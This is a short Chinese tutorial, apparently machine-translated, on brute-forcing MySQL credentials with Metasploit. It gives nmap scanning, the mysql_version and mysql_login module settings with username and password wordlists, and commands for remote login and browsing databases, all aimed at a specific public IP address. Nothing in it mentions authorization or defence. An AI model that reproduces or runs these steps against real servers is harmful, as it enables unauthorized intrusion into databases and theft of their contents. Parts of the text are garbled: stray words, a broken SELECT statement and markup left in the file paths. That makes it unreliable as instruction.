使用Metasploit暴力攻击MySQL

Metasploit是一个多功能工具，非常支持利用，因为在本文中，我将通过使用Metasploit在MySQL上执行暴力破解来分享有关数据库利用的技巧。但在继续之前，请确保您已在终端中安装了metasploit，如果您尚未安装metasploit https://www.metasploit.com，请在以下网址下载。

此外，在进行暴力破解MySQL之前，您还需要NMAP之类的信息收集工具来进行端口扫描，Nmap本身具有许多功能，而不仅仅是端口扫描。

首先，请打开nmap进行端口扫描，目标服务器上是否有mysql服务运行。

nmap website.com

在上图中，可以看到如果 mysql 端口是 3306，那么我们继续使用以下命令运行 metasploit。

sudo msfconsole

use mysql_version

set RHOSTS 103.78.73.108

run

然后，还将模块mysql_login设置为使用以下命令暴力破解目标mysql。

use mysql_login

set RHOSTS 103.78.73.108

set USERNAME root

在“用户名”部分中，您还可以使用已创建的用户名列表，或者输入用户名，例如在根或其他内容上方。如果要使用单词列表用户名，请使用以下命令进行设置。

set USER_FILE /<em>home/kali/userlist.txt</em>

将 /home/kali/userlist.txt 替换为用户列表的位置。

set PASS_FILE/home/kali/<em>passlist</em>.txt

将 /home/kali/passlist.txt 替换为密码列表的位置。

然后使用以下命令运行该模块。

run

等到metasploit完成它的工作，如果成功模块会自动停止并显示mysql用户名和密码。下面是结果的示例。

如果你现在得到了目标mysql的用户名和密码，我们只需要远程做远程mysql，但是如果你有mysql登录的东西，这部分就被跳过了。

telnet ip 3306

mysql -u username -h 103.78.73.108 -p

然后，如果MySQL远程成功，结果将如下图所示。

如果是这样，你只需要oprek数据库，或者如果你真的不知道mysql命令，我可以在下面帮助你一些基本的命令。

show databases;

此命令用于查看数据库名称

use namadatabase

输入数据库的命令

show tables;

用于查看 batabase 内的娜娜表

select from nama_columns;

用于查看数据库列的内容